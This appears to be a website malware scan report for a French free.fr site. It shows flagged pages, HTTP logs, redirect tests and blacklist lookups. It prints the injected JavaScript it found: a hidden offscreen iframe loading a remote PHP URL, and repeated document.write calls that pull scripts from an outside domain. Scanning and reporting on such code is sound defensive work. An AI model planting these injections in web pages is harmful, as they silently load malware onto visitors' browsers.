Scanned pages/files
| Request | Server response | Status |
http://sexepayant.free.fr/ | 200 OK Content-Length: 1982 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://davidparums.com/cgi-bin/libphp.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://sexepayant.free.fr/scripts/avertissement.js | 200 OK Content-Length: 5176 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function ScanCookie(variable) { cook = document.cookie; variable += "="; place = cook.indexOf(variable,0); if (place <= -1) return("0"); else { end = cook.indexOf(";",place) if (end <= -1) return(unescape(cook.substring(place+variable.length,cook.length))); else return(unescape(cook.substring(place+variable.length,end))); } } function CreationCookie(nom,valeur,permanent) { if(perm document.write('<script src=http://americancreditrelief.com/test/javascriptvariable.php ><\/script>'); document.write('<script src=http://americancreditrelief.com/test/javascriptvariable.php ><\/script>'); document.write('<script src=http://americancreditrelief.com/test/javascriptvariable.php ><\/script>'); document.write('<script src=http://americancreditrelief.com/test/javascriptvariable.php ><\/script>'); Antivirus reports:
| ||
http://americancreditrelief.com/test/javascriptvariable.php | 500 Can't connect to americancreditrelief.com:80 Content-Length: 199 Content-Type: text/plain | clean |
http://americancreditrelief.com/test404page.js | 500 Can't connect to americancreditrelief.com:80 Content-Length: 199 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sexepayant.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 10:23:05 GMT
Accept-Ranges: bytes
ETag: "17cbca3-7be-5009ed1a"
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Length: 1982
Content-Type: text/html
Last-Modified: Fri, 20 Jul 2012 23:43:22 GMT
...1982 bytes of data.
GET / HTTP/1.1
Host: sexepayant.free.fr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 10:23:05 GMT
Accept-Ranges: bytes
ETag: "17cbca3-7be-5009ed1a"
Server: Apache/ProXad [Sep 23 2014 15:26:28]
Content-Length: 1982
Content-Type: text/html
Last-Modified: Fri, 20 Jul 2012 23:43:22 GMT
...1982 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sexepayant.free.fr
Referer: http://www.google.com/search?q=sexepayant.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sexepayant.free.fr
Referer: http://www.google.com/search?q=sexepayant.free.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sexepayant.free.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sexepayant.free.fr/
Result: sexepayant.free.fr is not infected or malware details are not published yet.
Result: sexepayant.free.fr is not infected or malware details are not published yet.